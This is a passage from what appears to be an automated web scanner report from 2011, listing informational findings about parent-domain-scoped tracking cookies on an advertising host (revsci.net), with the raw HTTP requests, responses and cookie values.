rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8q/n8RHJiFTfZw+jQwruBibDv6FE0by7wXSZfIehdNusyWJcwxHk7ExeM2+IrYKTVEIxXfX8x6Xcpot+zgVa5Yq1M95vlSsvZIAJNgAjiVIWy36LdaOhH7VY0QbTZ5R+dnWDAc1Pbw5/D6RTLvJHembgsXY2UxU4NpeUlqGPYPHHIaLif3c40dcaYs7U7RoG6HLIB4TPLZW1UoBndUm57C2U5BX5ZMmZEdlX0BGaM7JVuubnZa2kklur5r41CuibjGfD2KGC2VGkTHdXu/hT+6DUE46e1hUKp2JuL2Po6aztCuPxW/8y0zYtH/1XhYzRIK9j93s1xFHiYTpQfD/BZCEBrDobN712wvGrFEkgv5XmRnO7nEJTpLqLMKfQfX7n04chNbT2MBOK1DIDnjjse8cpF425T7BYL92Uqiy10lGuJfQBsyGqW1kOBdFrUUV//lb/g4Nma0osmsWtCmpQ5yIXsi32HeHHFaJbtczw9e9YtzqsrQ5OX9paHeGRGFTboGOOLx/13uGTnAX6NOrSD9XjYLa+3lttAVZNZiMtI66kkHcCkZcxcpXp0k0G5RsWG6ZehGp1TcsCM8qnoAnK5/R22SWsNEs0BL2Bd9Nt2PeKxKxcoicfEt+CMGbI0i7K5tfmjmOvulIeA2x/NgdPSDxZWgVWRfn+VD8D0AqaYnENTEWsRy8mzH98f3S3QYkfuCqXmZnUmsp1dlByEXw/4vcjQ7n30AdxB8D6CAeQ/PQCPxQcz1D+oT54shoq7Ree+fUhbBl5CnD0F9kvAmAerYc3Ms6ILpvA6xVdPPYpOICI9cQsw65NLdOM7d38okEpy2U/FWqUg467MUnknp9A9DLDqn2HNNMktXQf6ZKJUwks6U8Na346cxbOnM2A6hbnLQG4/TuLURUZg2ExvR78Mbblw1fzbEurGsFRgs+IfEvpkAETMEzjq56sqVYLzOHSo/pArwovIJ/MJHWOvUWx2nKv/K25VE60+FptDEP1pnpAwAiyhfQ6O6CbHt0wF9h/DatbZ942L9elD0Rmp9LU0ituiKtAnHfE5Onmr4vZpKvJngUKKOLUqeFJGbjjbXlhJ2Tg5WW4w1AUG2Gfa1YZYy1IhnXTYPOcpckTvZkHhv6BHjJ6+fm5/Kia9xWI9/4EzdWuRfC8Jwmo1gN1n7bYSvQI6gpoknLRkBuO6sTSZBohE+ys1ULyDIx5ePjPUXCqbcTBDSoI62xj0Vk1ohtKStq4N8hiOzWUqC8acK7TdOyPtdh0AYuxFh8vpFeiPN5lug1oFrjggUoa/PD1uxJTMjdpk5dzNSGmG6rKVOI9UG5VXtC02eYnnr/bDcNEKZROz+vMevL+HefijTJ1IovaQmn3yAZ5zZPUleccX0Lh+r5oDxK/0DeyTtj7fTvaHqTc9ISY798hb62fjZwKRBW/ueUh+twiJW3yUJEBhtXsBTpUHf0gdCP8Y4/SFUEX1bRFopccDqjGAsVEnVHGofgmJ+uEXzNvTKqgLX/Nn+XI5tLJ9ooObBocSauhYtCLOypIAj/D6XKaZW5dBu2nl7bvjWWBjV5pcfZn2faKQXmBJwLyJffhhnaVQ1RtPmPB3aR62w2nurUr8ra5w5KTgTHvO9ImpTxGKxeTS8QssUcWXPh4xFC3BgE+kYVP42JaxM3SFXi4/AtpM4+R5x7Hq8WcZ7TsCWIXYUjH5NmI3Cyq25yiqxRURQsv+2WKgiEHqk2YPjQKTg0/SVgOQczrr3r9CgA0EEKEl9Qb"; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfqAC2mBgKcDz10E2TZRRbEIyCo+UWdZpsGrYYdh3uUdQO6FifraFYWi4K9eib+f+DcjX+iq0ww/t2ApwL+IaWQAWmnFp5FmLBjW7eLLplXFs08LFzYabwcAaYOpnwIMBLA0IVDPkkyj9OMIYKQd6IFV/U7eaOKVua9gPotMMzueprzslREZWlP8DC0Z6ahAC9GNOaNN9SIPSSgIVwuLxxEDRELV8jDVWRaOEfRhYIjeYdIQm2Jh608+j0zQGsuKr2XIs5St8xlY1ZHabBxQyHBp574yIAEU0C78woSo+X/5i9wLzjKol7+V3AYUsJRrRHjp41Dh+z72spGdJ8c4vwdV6vef0IiZMxwMsPTtEbccfni5KjMfY2wiiH8+9UVMO+wju5OjM3NTtF95y49ILxl9xqWlGil4lWV5IXjnOvWA3dpvcwA+8j9y7GF6gODWZE0CaO4shglOchb1plTnd9NlsYcu85wdBBuUGhXJ0NkWDoHLntRWjxCDMKskjwGvCMjx2l8QCPhtsAqq7lT2fsCAnYZqrw3n+wRYSukjOMdEFMH095+w6kmZgwekx/gKmIzky0gS2QxO463ZSGubNXBAfJHWdgu+9os/AfHReFm7z3LyXFhvui9XNhoEA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXZ8qnxnNHqGrp84hH/bhN0xQOOlD7YTKMTz5jLRWbQcdYbDr7Hjqv0yExhy1fy3n104B0a6KC4V5fwl/ueW59kACHLWrA+OydZDjZS9CIFnDETNjcdmwWlQPRzO+JjeN8UHPBRTjLTQMJBSE/72npdUNpRoMWq+9zSsWL2ZvvxerT0Qs8VVocrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9NtGZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+URhAE83doE5n/Jh7rUvLssOKNIl0z9NOW8n0Io1Z0J+sMQ+tZ6lcs2ixNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:10:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:10:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.131. http://pix04.revsci.net/I10985/b3/0/3/1008211/20510025.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/20510025.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/LhztKuWrz1dEPG5Xt07bm2Mr9ewY2PdAJgSNEMnWDMpRCe+ILKfuMcbRlTlpTS3KiAJLhXLRpCtzPt0QJSAd72ueUph4qXiXpLwAJncCH8Jz+R5tVSYoe8IS4HncpOflPPhVKmF2KK5bp6xF6FD1lDLVlA11XPGBrY9ERpafwHQedYg1ZiNNk=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:19:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/20510025.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_kTuc="MLsXtSENZjhvJ5E42+o8IIHenkhq5qBeuROGrbg7AoKivO1nITCoimr8lQBsr1lhxog3ezVA0qd2NbnfmznwdDZ+f/x50E7g9ByC5EdiBwIrjEgfH8uhhOZRWr2BHoXXj3uew6Wiq1cNENFE3yHIPMbarmxNg+FfHDCNsyAI1deNKjqJWlxQPohdd+u31y3NhEqlovxoOB0cgv8pnl66pdeidTJytAdKFPDfJqeAM9wy8MGiaDlAsGlqEcq7v4CuZaiAIJAnJkQYdmO1VWZpHd0EIVqbaW/bCQZ48camyEGk64IvOF24ahK/Ag7zYXcjpVSHioU7aI4KNCYdVL3kw/7TE6Oyj298OteCviwbVcv7IBu1OHTQzxKo2Sv/e2fxU8O6J15snkKjqgmuwdCEe2saP18TyVXXq9Sr9g45UrvdRI3tH1zwjhLQ8WEkEm7rOowq4WdqL0CNOLZChuTQQvY6F3/3A6/vLFu3SSxKtEJqVUpRqc4QsO1rG73AEAEXnKOAjRfqJXcqBAm+u9EhdNTO/2wLfw90G5YEbOqvOX9/FcJvoxfeAX1UCdCu5MCWd2u/kTy89k7B/1K+sirDKcEa5Wo7/qRi7ww4YUgQHY8j6AB0YklBHJEv4svafFuoaWWHEbEYP5roVshyb4Iu8pjSfZr2ZzzIpJnEI7QaZycRtCZryD1PFNJYNJg8Cd6ae3XzD3lB8BsN4OkLFYEuRpF6J97mNmjIpuRiZcefBXWDvPhFb3UKdWv7z1rfYE+rS2O62/95kfaxkC5HhsC37i0rylfUHPWm5Lq6quQOWxw8nJS09YaCemPCvxN/2JsWrrXTNmkeg1hfH4P8xQGBx83N1UXSqAUl6ECj4H91QSzrLdQ9COE897U3x72RA76m7b4EfnsiwVQBD0nh21QSLobE/+cyRSHvJ5Yiks6exwr4XdY/AS4AS9q1FXhWxrNHTZXzuVpmQdDJLfThH31cSW6LsVpEq0xwO84D+k8LCDbzhttEfuNwf3llRtrGo95K2fgzDx7YGxmRzuJB4EBiUitmxicwOnCJhiH/yzXpJtl97znMnaYDee6KrJMQaOpdkXRSPf/0sfvZwxC2GtbGtBebmfkh35sPHRoY0UUnfmAIJvfJ9JUooS8FWMkx7eYcOpY3iYw9YW1+kknkgnM7RQh6hW/Jmjw9MiA484DWjY+UGY+sJ7u+QAIOwufE5MMzJX5wPky3Z1niedb1vt7XRz7dTOcrfycIXcI0AQSrE7nHeOxFuHOvVZQZ3elY3cKQzNhC/5LWOOADBjt/b39oOwG6pFpZXNBPhytdFEqPL7i2XS12AqH8Mnxwsi8D1VV/l64IK4wUNCmYDI+D/qawUpi81uM="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJicxDnb++8q/n8RHJiFTfZw+jQwruBibDv6FA0by7wXSZvEeljrlKBt9U605cIFGcmpbl76qyAEMzXfX8x6Xcpot+zgVaZYq1M95vlSsvZIAJNgAjiVIWy36LdaahH7VY0QbTZ5R+dnWDAc1Pbw5/D6RTLvLHembgsXY2UxU4NpeUlqGPYPHHIaLif3c4kdcaYs7U7RqG6XLIB4TPLZW1UmjtB8DH8MRXELuqAYlGXY9DAtr1JxLtIxJ+X9V+3Hj+fVdCdO69pAagzqg6/uEDPF/vHf/G7WXxx07vdw9uNohbF01XvwDtCkO+WNwy+zqtXO9w2n2QgiP5OKSdL+gsqoo3L8t7KNxdRgVAaBE55UDUPe2e3u8x16AHVQ5kr0cLuJK5K/g3bvwRX1QKAxrUDQBDP67diCi6SZsb4hCU690aisxc03+RJXwhAjruzKL/zpgWJvz5hyy4i4NmaVJMmsSuCmpf5yIXsi32HeHHBaJbtczw9e9YtzqsrQ5OX9paHeGRGFTboGOOLx/13uGTnAX7NNrSD9XjYLa+3lttAVZNZiMtI66kkHcCkZcxcpXp0k0G5RsWG6ZehGp1TcsCM8qnoAnK5/R22SWsNEs0BL2Bd9Nt2OfKxKxcwicfEt+CMAbIEu7L5tfmjmevulIuA2x/FgdPSDxZWgVWRfn+VD8D0AqaYnENTEWsRy8mzH98f3S0QYkfuCqXmZnUmjp0dlJwEXy/43ciQ7n30AdxB8D6CAeQ/PQCPxQcz1D+oT54shoq7Ree+fUhbBl5CnD0F9kvAmAerYc3Ms6ILpvA6xVdPPYpOIBI8sQsw65Nssy0nd38okEpy2U/FWqUg467MUnknp9A9DLDqn2HNNMktXQf6ZKJUwks6U8Na346cxbOnM2A6hbnLQG47TubURUZg+U6vR78Mbblw1fzbEurGsFRgs+IfEvpkAETMEzjq56sqVYLzOHSo/pArwovIJ/MJHWOvUWx2nKvvCy4VE60+JptzEL1p3pAwAiyhfQ6O6CbHt0wF9h/DatbZ942L9elD0Rmp9LU0ituiKtAnHfE5Onmr4vZpKvJikUK2OLUqeFJGbjjbXlhJ2TgZWS4w1AU+2F/alYZf21IhnXTYPCcpUkTvVl9cjm0kDEoeY5+urqsgGn841E42L5A/eBVBOp6CnBPUOArfv4QB7I/FE72+cm1BAP4FyEfENPjP+DwDIxxePjPcekO3I2x4SNGq/+hj8oBSjJNbT+Y0E1ToOplyQI+BvLDO0Ebdkt7yPWXMHfj851lzhfLlaLKKihH8E8ttdfNetmM3z9LCmUnuaxYleV7Fd5yAxKxK3f8ffrkAo73qbFcYAMqjUxcC+DuMsOsiuOEOY4y/aBlEuPX7h7TofP0/az4AKDk+aGBKdSoydh9dAnaHqDc9ISY798hb62fjZwKRBW/ueUh+twiJW3yUJEBhtXsBTpUHf0gdCP8Y4/SFUEX1bRFonccDqjGMnuEnVHGofgmJ+uEXzNvTKqgLX/Nn+XI5tLJ9ooObBocSauhYtCLE5iogIIHF6M7ZwpQ/u2/58l6GMgC9EtzvyNdqiq22WL+VHRN0bwsZey6+iNMPpujzDBSY38Gu9CJ23EmNBy+o7DQ3lQQOnNUh8vl0mLCe7SG9pPmKxqtDKsMA7kj2S2f0j4TyidG0poGGKaUhajVgNZFLX7KGv8xxLCRwu9ZBDYqk/4OqaVqqpCn8BNdGLT8PGism4SaliIL0vNcomFLFfYDskbrGHrKMdVY"; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05ZbNqmtVtCSg/DW3ynPdQrdHoRUpGqTvQGYPTNWz9JVAH9tRfjw4t7jgY8E1Syo1RXJ3j/iiKhEBH6CcFOAsZTHyGci6z08ra07WZZuavu0gC4rxNnZ3nu/7w3rzBduHuYcjb1soyILRWKIS+7LyZ7TmE7e99bDIS7fGQBwxkT6ha/MJfg6WACWnPOCvVQcLLS25O2RfowaeNN0=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/LhztKuWrz1dEPG5Xt07bm2Mr9ewY2PdAJgSNEMnWDMpRCe+ILKfuMcbRlTlpTS3KiAJLhXLRpCtzPt0QJSAd72ueUph4qXiXpLwAJncCH8Jz+R5tVSYoe8IS4HncpOflPPhVKmF2KK5bp6xF6FD1lDLVlA11XPGBrY9ERpafwHQedYg1ZiNNk=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:19:13 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:19:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.132. http://pix04.revsci.net/I10985/b3/0/3/1008211/206078584.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/206078584.js

Issue detail

